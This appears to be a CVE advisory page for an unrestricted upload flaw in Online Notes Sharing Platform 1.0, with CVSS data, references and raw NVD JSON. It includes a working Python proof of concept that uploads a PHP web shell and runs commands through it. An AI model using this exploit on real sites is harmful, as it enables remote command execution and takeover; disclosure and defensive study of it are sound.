CVE-2025-12862

Description

A vulnerability was identified in projectworlds Online Notes Sharing Platform 1.0. Affected by this issue is some unknown functionality of the file /dashboard/userprofile.php. Such manipulation of the argument image leads to unrestricted upload. The attack may be performed from remote. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:projectworlds:online_notes_sharing_platform:1.0:*:*:*:*:*:*:* - VULNERABLE

projectworlds Online Notes Sharing Platform 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12862 PoC - Unrestricted File Upload in Online Notes Sharing Platform 1.0
# Target: /dashboard/userprofile.php

def exploit(target_url, session_cookie):
    """
    Exploit for CVE-2025-12862: Unrestricted File Upload
    This PoC demonstrates uploading a webshell to the vulnerable endpoint
    """
    
    # Prepare the webshell content
    webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    
    # Prepare the multipart form data
    files = {
        'image': ('shell.php', webshell, 'application/x-php')
    }
    
    # Prepare the request headers with authentication cookie
    headers = {
        'Cookie': f'PHPSESSID={session_cookie}'
    }
    
    try:
        # Send the malicious upload request
        response = requests.post(
            f'{target_url}/dashboard/userprofile.php',
            files=files,
            headers=headers,
            timeout=10
        )
        
        print(f'[+] Status Code: {response.status_code}')
        print(f'[+] Response: {response.text[:500]}')
        
        if response.status_code == 200:
            print('[+] File uploaded successfully!')
            print('[+] Access the shell at: /uploads/shell.php?cmd=whoami')
        
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        sys.exit(1)

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <target_url> <session_cookie>')
        print(f'Example: python {sys.argv[0]} http://target.com abc123')
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    exploit(target, cookie)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12862
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12862
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12862/
[4] VulDB https://vuldb.com/cve/CVE-2025-12862
[5] https://github.com/K1nakoo/cve/blob/main/tmp74/report.md
[6] https://vuldb.com/?ctiid.331509
[7] https://vuldb.com/?id.331509
[8] https://vuldb.com/?submit.679802
[9] https://vuldb.com/?submit.748850
[10] https://github.com/K1nakoo/cve/blob/main/tmp74/report.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12862", "sourceIdentifier": "[email protected]", "published": "2025-11-07T17:15:47.257", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in projectworlds Online Notes Sharing Platform 1.0. Affected by this issue is some unknown functionality of the file /dashboard/userprofile.php. Such manipulation of the argument image leads to unrestricted upload. The attack may be performed from remote. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectworlds:online_notes_sharing_platform:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "B61A11EC-0EB1-4C7A-A143-DACB1B259827"}]}]}], "references": [{"url": "https://github.com/K1nakoo/cve/blob/main/tmp74/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.331509", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.331509", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.679802", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.748850", "source": "[email protected]"}, {"url": "https://github.com/K1nakoo/cve/blob/main/tmp74/report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}